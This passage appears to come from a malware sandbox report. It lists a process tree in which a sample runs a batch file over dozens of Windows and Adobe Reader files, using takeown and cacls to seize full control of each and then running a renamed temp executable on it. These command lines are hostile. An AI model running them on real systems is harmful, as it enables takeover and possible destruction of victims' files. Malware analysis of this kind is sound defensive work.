      PID:316
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""
  2⤵
  PID:616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:1904
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:2024
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Memo.jtp" -nobanner
    3⤵
    PID:1436
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Memo.jtp" -nobanner
      4⤵
      PID:904
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:324
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    - Modifies file permissions
    PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:1904
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:964
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  PID:928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    PID:1820
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      PID:1220
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    PID:1404
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      PID:924
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "RTC.der" -nobanner
    3⤵
    PID:616
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "RTC.der" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
  2⤵
  PID:948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    3⤵
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ended_review_or_form.gif" -nobanner
    3⤵
    PID:1440
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ended_review_or_form.gif" -nobanner
      4⤵
      PID:928
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  2⤵
  PID:324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
    3⤵
    PID:924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "server_issue.gif" -nobanner
    3⤵
    PID:1460
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "server_issue.gif" -nobanner
      4⤵
      PID:1116
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      PID:972
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1260
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "main.css" -nobanner
    3⤵
    PID:1836
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "main.css" -nobanner
      4⤵
      PID:1408
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:1644
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1096
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    - Modifies file permissions
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:1004
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:1444
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  PID:1076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    PID:596
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      PID:2024
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
  2⤵
  PID:572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    3⤵
    PID:928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    3⤵
    PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "SY______.PFB" -nobanner
    3⤵
    PID:1808
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "SY______.PFB" -nobanner
      4⤵
      PID:952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
    3⤵
    PID:1460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
    3⤵
    - Modifies file permissions
    PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    3⤵
    PID:112
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
      4⤵
      PID:324
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "open_original_form.gif" -nobanner
    3⤵
    PID:1440
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "open_original_form.gif" -nobanner
      4⤵
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:1444
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:1816
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:1820
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      PID:1076
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      PID:2028
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  PID:1736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "warning.gif" -nobanner
    3⤵
    PID:1888
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "warning.gif" -nobanner
      4⤵
      PID:1028
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  PID:1836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "tl.gif" -nobanner
    3⤵
    PID:928
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "tl.gif" -nobanner
      4⤵
      PID:1436
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    - Modifies file permissions
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    PID:1260
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      PID:1120
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"
    3⤵
    - Modifies file permissions
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ReadMe.htm" -nobanner
    3⤵
    PID:1484
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ReadMe.htm" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      PID:1620
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "MinionPro-Bold.otf" -nobanner
    3⤵
    PID:924
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "MinionPro-Bold.otf" -nobanner
      4⤵
      PID:568
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1136
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:1028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\takeown.exe
